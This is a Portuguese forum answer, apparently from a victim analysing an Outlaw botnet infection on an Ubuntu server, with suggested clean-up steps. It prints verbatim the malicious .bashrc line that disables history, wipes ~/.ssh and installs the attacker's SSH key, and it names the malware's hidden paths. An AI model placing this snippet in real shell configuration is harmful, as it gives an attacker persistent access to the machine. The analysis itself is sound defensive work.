O mesmo aconteceu comigo e eu notei ontem. Eu verifiquei o arquivo /var/log/syslog
e este IP (185.234.218.40) parecia estar executando automaticamente cronjobs.
Eu verifiquei em http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) e ele tem alguns relatórios. Estes arquivos foram editados pelo cavalo de Troia:
- .bashrc
- .ssh / allowed_keys
Eu encontrei isso no final de .bashrc
(que é executado cada vez que o bash é aberto):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Ele está excluindo seu authorized_keys
arquivo, que é uma lista de chaves SSH que têm permissão para se conectar sem uma senha. Em seguida, adiciona a chave SSH do atacante:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Além disso, encontrei esta pasta: /tmp/.X13-unix/.rsync
onde estão todos os malwares. Eu até encontrei um arquivo, /tmp/.X13-unix/.rsync/c/ip
um arquivo contendo 70.000 endereços IP, que provavelmente são outras vítimas ou servidores de nós.
Existem 2 soluções: A:
Adicione um firewall bloqueando todas as conexões de saída, exceto a porta 22 e outras que você achar necessárias e ative o fail2ban, um programa que bane um endereço IP depois que X falha na tentativa de senha
Mate todos os trabalhos cron :
ps aux | grep cron
, depois mate o PID que aparece
Altere sua senha para uma segura
B:
Faça backup de todos os arquivos ou pastas que você precisa ou deseja
Redefina o servidor e reinstale o Ubuntu ou crie diretamente uma nova gota
Como Thom Wiggers disse, você certamente faz parte de uma botnet de mineração de bitcoin e seu servidor possui uma porta dos fundos . O backdoor emprega uma exploração perl, um arquivo localizado aqui /tmp/.X13-unix/.rsync/b/run
:, contendo este ( https://pastebin.com/ceP2jsUy )
As pastas mais suspeitas que encontrei foram:
Finalmente, existe um artigo relacionado ao Perl Backdoor aqui:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Espero que você ache isso útil.
.firefoxcatche
provavelmente não tem nada a ver com o firefox - poderia ser apenas um minerador de bitcoin? Tente fazer o upload dos executáveis para o virustotal.